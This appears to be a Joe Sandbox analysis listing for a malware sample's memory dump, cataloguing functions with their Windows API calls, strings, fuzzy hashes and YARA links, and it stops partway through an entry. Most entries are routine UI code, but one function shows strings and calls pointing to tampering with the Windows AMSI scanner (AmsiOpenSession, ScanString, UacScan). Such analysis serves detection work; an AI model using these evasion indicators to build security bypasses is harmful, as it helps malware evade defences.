Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: HugeRead$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1004233883-1650066521
Opcode ID: e0b5cc7925e56eb713b2e084d0bde20399ec6bf059e9bd0a66e4105aa39d8e88
Instruction ID: c02657c551ba3f7b8765140c508c1c278f7d6e9fb88546a677f031e2ac8de94a
Opcode Fuzzy Hash: e0b5cc7925e56eb713b2e084d0bde20399ec6bf059e9bd0a66e4105aa39d8e88
Instruction Fuzzy Hash: C3318372A00305FBEB50EFA4CC81F9E77A8AF15729F108514EA15BB281D771F990CB69

Uniqueness

Uniqueness Score: -1.00%

Function 04095644 Relevance: 16.7, APIs: 11, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 04095667
SelectObject.GDI32(?,00000000), ref: 040956DB
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 040956FD
SelectObject.GDI32(?), ref: 04095753
SetBkColor.GDI32(?), ref: 0409578E
SetBkColor.GDI32(?,00000000), ref: 040957BC
SelectObject.GDI32(?,00000000), ref: 040957CF
DeleteObject.GDI32 ref: 040957DB
DeleteDC.GDI32(?), ref: 040957F1
SelectObject.GDI32(?,00000000), ref: 0409580C
DeleteDC.GDI32(00000000), ref: 04095828

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Object$Select$Delete$Color
String ID:
API String ID: 1817384775-0
Opcode ID: 165641b4e0c392b6c02182dfb4a1aef5a815b901079e5b5e8f2d7f8687f8bc58
Instruction ID: 06e4d1775f919e048210968915aa724d5f4f808b5a3d6061749c3f654a01d023
Opcode Fuzzy Hash: 165641b4e0c392b6c02182dfb4a1aef5a815b901079e5b5e8f2d7f8687f8bc58
Instruction Fuzzy Hash: 6D513C72E10608BBEF11EBE9CC44FEEB7FCAB08718F004855B615FB280D675A9049B65

Uniqueness

Uniqueness Score: -1.00%

Function 040CBCF8 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 400processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0408FD38: GetProcAddress.KERNEL32(0410A358,00000000), ref: 0408FD97
Part of subcall function 0408FD38: GetCurrentProcess.KERNEL32(0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0408FDE3
Part of subcall function 0408FD38: FreeLibrary.KERNEL32(0410A358,00000000,0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000), ref: 0408FDF4

CreateProcessAsUserW.ADVAPI32(041FEA3C,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,041FEBB8,041FEBFC,ScanString,041069E4,040CC330,OpenSession,041069E4), ref: 040CC05F
WaitForSingleObject.KERNEL32(041FEBFC,000000FF,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,UacScan,041069E4), ref: 040CC2AB
CloseHandle.KERNEL32(041FEBFC,041FEBFC,000000FF,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,UacScan), ref: 040CC2B6
CloseHandle.KERNEL32(041FEC00,041FEBFC,041FEBFC,000000FF,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330,ScanString,041069E4,040CC330,OpenSession,041069E4,040CC330), ref: 040CC2C1

Strings

OpenSession, xrefs: 040CBD8A, 040CBF2E, 040CC0DC, 040CC1C8
AmsiOpenSession, xrefs: 040CBE8C
Amsi, xrefs: 040CBE9D
UacScan, xrefs: 040CBD31, 040CBED5, 040CC06B
ScanString, xrefs: 040CBDE3, 040CBF87, 040CC14D, 040CC239

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CloseHandleProcess$AddressCreateCurrentFreeLibraryObjectProcSingleUserWait
String ID: Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
API String ID: 1235825717-661810597
Opcode ID: 549b95a746790b70374d2c1dc4fee7a9f73411914282267ef62b9fe3570f7803
Instruction ID: ab3d0c618fdd31349c7b4132ba9502cf782ed0b01d14b6afb3a0e344e1fd2af7
Opcode Fuzzy Hash: 549b95a746790b70374d2c1dc4fee7a9f73411914282267ef62b9fe3570f7803
Instruction Fuzzy Hash: 50F1FD31E10159DBFB50EBA4D980BCEB7B9AF4520CF118165E108BB264DB34BD468F9A

Uniqueness

Uniqueness Score: -1.00%

Function 0407743C Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 61registrywindowclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 0407746F
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 0407747B
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 04077493
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 040774B7

Strings

Magellan MSWHEEL, xrefs: 0407744A
MSWHEEL_ROLLMSG, xrefs: 0407745B
MouseZ, xrefs: 0407744F
MSH_WHEELSUPPORT_MSG, xrefs: 0407746A
MSH_SCROLL_LINES_MSG, xrefs: 04077476

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: ClipboardFormatMessageRegisterSend
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1437703442-3736581797
Opcode ID: a9a78b8864fb31aa425399b5ee6b96a2ae1a1b34aef71b7ee598d5d687c65601
Instruction ID: ceff1bee0dd006eda1752d020062ca3d04b45a7f3775292c585c99e2cbbdb185
Opcode Fuzzy Hash: a9a78b8864fb31aa425399b5ee6b96a2ae1a1b34aef71b7ee598d5d687c65601
Instruction Fuzzy Hash: 99113070B84305AFE711AFA5DC41F66BBE8EF44794F108465FA44AF240E7B0B941CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 040BF0F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 040BF143
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 040BF161
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040BF16E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040BF17B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040BF188
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 040BF195
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 040BF1A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 040BF1AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 040BF1CD
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 040BF1E9

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction ID: c9f07f534006ad720041494db6eef62e255d19cb02452b10114f9596e90b75e2
Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction Fuzzy Hash: AE216870784705BAF720EB24CC8DFDA7AD85B00B1CF0148A0BA49BF6D2C7B5BA448758

Uniqueness

Uniqueness Score: -1.00%

Function 040725CA Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

An unexpected memory leak has occurred. , xrefs: 0407272C
bytes: , xrefs: 040727F9
Unexpected Memory Leak, xrefs: 0407295C
7, xrefs: 0407273D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 040728E5
, xrefs: 040728B0
The unexpected small block leaks are:, xrefs: 040727A3

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 0d9af927a3607a0c31042507bf3a754ddf2e34cdc08aecb534ddf84e4cd9dd37
Instruction ID: 7f1e1b836ec84ff1c2f59643e9aadf94dee4d7dd72e9c8dcc05b431014cc3315
Opcode Fuzzy Hash: 0d9af927a3607a0c31042507bf3a754ddf2e34cdc08aecb534ddf84e4cd9dd37
Instruction Fuzzy Hash: A571F830E042588BEF619B2CC884BD8B6E4FB49714F1440E9D549FB242DB75A9C5CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 040AA170 Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 040AA1AB
MulDiv.KERNEL32(?,?,?), ref: 040AA1C5
MulDiv.KERNEL32(?,?,?), ref: 040AA1F3
MulDiv.KERNEL32(?,?,?), ref: 040AA209
MulDiv.KERNEL32(?,?,?), ref: 040AA241
MulDiv.KERNEL32(?,?,?), ref: 040AA259
MulDiv.KERNEL32(?), ref: 040AA2B0
MulDiv.KERNEL32(?), ref: 040AA2DA
MulDiv.KERNEL32(00000000), ref: 040AA300

Part of subcall function 04092518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04092525

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1ff6d16d4ab9dff2b3ebbf9d44987e39a0ba787ba11283991ee2ab9d489a07
Instruction ID: a167afb67d64af324c2e5ed61548ef85cde0a205737b918585bbdba882339a30
Opcode Fuzzy Hash: 4c1ff6d16d4ab9dff2b3ebbf9d44987e39a0ba787ba11283991ee2ab9d489a07
Instruction Fuzzy Hash: 09514C71708B50AFD320DAA9C844BAAB7F9AF45318F04481DF9D6D7281D63AF864CF21

Uniqueness

Uniqueness Score: -1.00%

Function 04075C18 Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(?,?,?), ref: 04075C7C
lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 04075CE0
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 04075D16
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 04075D7B
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 04075D87
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 04075DA9

Strings

\, xrefs: 04075D59
kernel32.dll, xrefs: 04075C30
GetLongPathNameA, xrefs: 04075C43

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: lstrcpyn$lstrlen
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 4046762626-1565342463
Opcode ID: 12f8d96eae78e578210b5a4df42cec4e3045031e5b97befd3743c19d8e43fe81
Instruction ID: c043beb4795c900ddf13659dc873c58ae1270103e6a53978348323fc561fe6de
Opcode Fuzzy Hash: 12f8d96eae78e578210b5a4df42cec4e3045031e5b97befd3743c19d8e43fe81
Instruction Fuzzy Hash: 18417F71D00659BFEB20DEE8CC88BDEB7FCEF48208F0485A5A544F7240E670AE508B59

Uniqueness

Uniqueness Score: -1.00%

Function 040963D4 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 351COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,00000000), ref: 040966C6
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0409677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 04096734
SelectObject.GDI32(?,?), ref: 04096773
DeleteObject.GDI32(00000000), ref: 04096779

Strings

(, xrefs: 0409658D
BM, xrefs: 040964F8

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Object$Select$DeleteErrorLast
String ID: ($BM
API String ID: 1836871137-2980357723
Opcode ID: 94eff14008940ac00b6bf386c0395b38444d539c293aa40a337fbd31a987e882
Instruction ID: 26809adeb540bda4be47c9ea7b4eec6e1272245fb859fb9d9c3ac610075219f4
Opcode Fuzzy Hash: 94eff14008940ac00b6bf386c0395b38444d539c293aa40a337fbd31a987e882
Instruction Fuzzy Hash: E4D12A70E002189FDF54EFA8C894BAEBBF5EF49318F008965E904BB294D735AC40DB65

Uniqueness

Uniqueness Score: -1.00%

Function 040AE58C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(?,?,?), ref: 040AE650
UnregisterClassA.USER32(?,?), ref: 040AE678
RegisterClassA.USER32(?), ref: 040AE68E
GetWindowLongA.USER32(00000000,000000F0), ref: 040AE6CA
GetWindowLongA.USER32(00000000,000000F4), ref: 040AE6DF
SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 040AE6F2

Strings

@, xrefs: 040AE5C5

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: @
API String ID: 717780171-2766056989
Opcode ID: a20b9a53fcf98c47abe3522add46ae43f8ed44320023e5bec12740613f096df5
Instruction ID: 6383ec811652fb39a36c91bc5f8dcdbfd36a01889244e1f5cce8c0a8a8e98e40
Opcode Fuzzy Hash: a20b9a53fcf98c47abe3522add46ae43f8ed44320023e5bec12740613f096df5
Instruction Fuzzy Hash: C2519C30A003549BEB20EBB8CC44BDE77F9AF05348F0449A9E855FB291DB34B955CB95

Uniqueness

Uniqueness Score: -1.00%

Function 040C06A4 Relevance: 12.2, APIs: 8, Instructions: 154windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 040C0715
GetCapture.USER32 ref: 040C0724
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 040C072A
ReleaseCapture.USER32 ref: 040C072F
GetActiveWindow.USER32 ref: 040C0780
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 040C0816
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 040C0883
GetActiveWindow.USER32 ref: 040C0892

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 9280deb75a94a71007e0374cce08badd7497ca604d27a65e24cb268942d9f255
Instruction ID: e600f639a996b32a9611fbf7d0b3147bbb0bb20af1367e8a1a637ca828d9c0ec
Opcode Fuzzy Hash: 9280deb75a94a71007e0374cce08badd7497ca604d27a65e24cb268942d9f255
Instruction Fuzzy Hash: 77514630A00244EFEB01EFA9C985BAD7BF5EF45748F1580A8E440BB261D779BE80DB45

Uniqueness

Uniqueness Score: -1.00%

Function 040AFD5C Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 040AFD79
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 040AFDB2
GetWindowLongA.USER32(00000000,000000EC), ref: 040AFDC6
GetWindowLongA.USER32(00000000,000000F0), ref: 040AFDE7
SetRect.USER32(?,00000000,00000000,?,?), ref: 040AFE17
DrawEdge.USER32(?,?,00000000,00000000), ref: 040AFE26
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 040AFE4F
RestoreDC.GDI32(?,?), ref: 040AFECE

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Rect$ClipIntersectLongWindow$DrawEdgeRestoreSave
String ID:
API String ID: 4023346126-0
Opcode ID: 1b597636fa919eb4861acb62e39998816952a479e217e6c919839162b512c386
Instruction ID: c7f8b3a8ad3e6ef4eed4b0cc08b753787963851ca3bf84ed01408584ab864139
Opcode Fuzzy Hash: 1b597636fa919eb4861acb62e39998816952a479e217e6c919839162b512c386
Instruction Fuzzy Hash: DF41F875E00209AFEB10EAE8C980FDEB7F9EB48318F1041A0E600BB291C675BE41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 040B3708 Relevance: 10.7, APIs: 7, Instructions: 162COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,040B38EC), ref: 040B37ED
GetTickCount.KERNEL32 ref: 040B37F2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 040B3836
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 040B384E
AnimateWindow.USER32(00000000,00000064,?), ref: 040B3893
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,040B38EC), ref: 040B38B6

Part of subcall function 040B6EC8: GetCursorPos.USER32(?), ref: 040B6ECC

GetTickCount.KERNEL32 ref: 040B38D3

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 90164ac57ddd3e3adb311bec24999e4594cb00f15e621f38266d4a807f125397
Instruction ID: 2283d972ad1b5ab942452be2ac833f36a8bdb341c6d538ba6c20c52ccb0c5080
Opcode Fuzzy Hash: 90164ac57ddd3e3adb311bec24999e4594cb00f15e621f38266d4a807f125397
Instruction Fuzzy Hash: 4B512774A00205EFEB10DFA8C984AEEB7F5EF45308F2046A4E980FB250D671BE45DB95

Uniqueness

Uniqueness Score: -1.00%

Function 040C40FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 040C54A8: GetActiveWindow.USER32 ref: 040C54CF
Part of subcall function 040C54A8: GetLastActivePopup.USER32(?), ref: 040C54E1

GetWindowRect.USER32(?,?), ref: 040C417E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 040C41B6
MessageBoxA.USER32(00000000,?,?,?), ref: 040C41F5
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,040C426B,?,00000000,040C4264), ref: 040C4245
SetActiveWindow.USER32(00000000,040C426B,?,00000000,040C4264), ref: 040C4256

Strings

(, xrefs: 040C415B

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Window$Active$LastMessagePopupRect
String ID: (
API String ID: 3456420849-3887548279
Opcode ID: ca61d957c40e1b8da1e279039c47bf56c8050803f4930def2033819e157e59aa
Instruction ID: 6c6819d352e75ae94f7228955146ccf9e9614f3f400e09b62dffd112ac87cc19
Opcode Fuzzy Hash: ca61d957c40e1b8da1e279039c47bf56c8050803f4930def2033819e157e59aa
Instruction Fuzzy Hash: 3F51D475A00218EFEB04DBA8CD91FAEB7F9FB88304F548469E900EB291D674BD008B54

Uniqueness

Uniqueness Score: -1.00%

Function 04093510 Relevance: 10.6, APIs: 7, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 040935E2
SelectObject.GDI32(?,00000000), ref: 040935F1
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0409361D
SelectObject.GDI32(?,00000000), ref: 0409362B
SelectObject.GDI32(?,00000000), ref: 04093639
DeleteDC.GDI32(?), ref: 0409364F
DeleteDC.GDI32(?), ref: 04093658

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: 285ee4c0b46929405e6ea6dda1ceafcda106b39ae8404a62d1e5820fd88a3e75
Instruction ID: 45853a6605ed73ffc0d55e32eeabe4eaf21593aa5df8f96b9648d3a3fb39531f
Opcode Fuzzy Hash: 285ee4c0b46929405e6ea6dda1ceafcda106b39ae8404a62d1e5820fd88a3e75
Instruction Fuzzy Hash: 7041FA71E10649AFEF50EBE8C845FAEB7F8EB0C718F014811BA15FB240D675AD049B65

Uniqueness

Uniqueness Score: -1.00%

Function 040AB0F4 Relevance: 10.6, APIs: 7, Instructions: 122windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 040AB12B
SelectObject.GDI32(?,00000000), ref: 040AB161
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 040AB187
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 040AB1A9
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 040AB1C8
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 040AB1E2
SelectObject.GDI32(?,?), ref: 040AB1EF

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: ObjectSelect$DesktopWindow
String ID:
API String ID: 2666862715-0
Opcode ID: ecb3496304ba5597a2ecb0794a8e3d737f192dc5c9fd938a3cd44fec7afef13e
Instruction ID: 4a80cc65b0eb73cfb146a8fa9289f033c0278ed6e1329945e56774ca7e9694a6
Opcode Fuzzy Hash: ecb3496304ba5597a2ecb0794a8e3d737f192dc5c9fd938a3cd44fec7afef13e
Instruction Fuzzy Hash: C3310BB2E006196FDB00DEECCC89DEFBBBCBF09618B414465B504F7244C676AD048BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0409B24C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 0409B285
GetSystemMetrics.USER32(00000000), ref: 0409B2AA
GetSystemMetrics.USER32(00000001), ref: 0409B2B5
IntersectRect.USER32(?,?,?), ref: 0409B2FE
IntersectRect.USER32(?,?,?), ref: 0409B314

Part of subcall function 0409ACA4: GetProcAddress.KERNEL32(0410A568,00000000), ref: 0409AD23

Strings

EnumDisplayMonitors, xrefs: 0409B264

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: IntersectMetricsRectSystem$AddressDisplayEnumMonitorsProc
String ID: EnumDisplayMonitors
API String ID: 2238260564-2491903729
Opcode ID: 7f55bd3abb56d7e02bdcc7303526009d8f0069846ce7f8bd5cf6b1de76fc8d3e
Instruction ID: 4d674e8b66319f4a301c815ce489de9e23ad03bae42426292373af9f4b8aec22
Opcode Fuzzy Hash: 7f55bd3abb56d7e02bdcc7303526009d8f0069846ce7f8bd5cf6b1de76fc8d3e
Instruction Fuzzy Hash: 32311972E04209AFDF50DEA5E884AEF77FCFF49264F048126E915E3200E674F9449BA1

Uniqueness

Uniqueness Score: -1.00%

Function 040BD0F0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 040BD161
GetWindowLongA.USER32(00000000,000000EC), ref: 040BD173
GetClassLongA.USER32(00000000,000000E6), ref: 040BD186
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 040BD1C6
SetWindowLongA.USER32(00000000,000000EC,?), ref: 040BD1DA
SetClassLongA.USER32(00000000,000000E6,?), ref: 040BD1EE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 040BD20A

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Long$Window$Class
String ID:
API String ID: 2026531576-0
Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction ID: f0feaacd072e931d16b533c927c87adbebe1e85fdeb300d1f81f9e9829fe0be6
Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction Fuzzy Hash: 90215270A0824276EA01A77C8C54AFEB6995F8125CF084A54B4E4BB3D0CB74F845D7DA

Uniqueness

Uniqueness Score: -1.00%

Function 0409B0A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0409B0FC
GetSystemMetrics.USER32(00000000), ref: 0409B111
GetSystemMetrics.USER32(00000001), ref: 0409B11C
lstrcpy.KERNEL32(?,DISPLAY), ref: 0409B146

Part of subcall function 0409ACA4: GetProcAddress.KERNEL32(0410A568,00000000), ref: 0409AD23

Strings

DISPLAY, xrefs: 0409B13D
GetMonitorInfoA, xrefs: 0409B0BC

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: e25340849241a9d55ad3be11c093fb5f4d349a493b29ae19e049d9015dcb19a9
Instruction ID: a213f1a823e3549079723293637211d9aebff32e1bfbb8c437cd5b390194fdf5
Opcode Fuzzy Hash: e25340849241a9d55ad3be11c093fb5f4d349a493b29ae19e049d9015dcb19a9
Instruction Fuzzy Hash: A511EE316003049FEB20CF65AC84BA7B7F9FF857A4F404929E855EB250D6B4BC849BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0409B178 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0409B1D0
GetSystemMetrics.USER32(00000000), ref: 0409B1E5
GetSystemMetrics.USER32(00000001), ref: 0409B1F0
lstrcpy.KERNEL32(?,DISPLAY), ref: 0409B21A

Part of subcall function 0409ACA4: GetProcAddress.KERNEL32(0410A568,00000000), ref: 0409AD23

Strings

GetMonitorInfoW, xrefs: 0409B190
DISPLAY, xrefs: 0409B211

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: 9541ffe8c6f5934f064177b02d239282142b545af1f6b59afb9b16bc4ec861e2
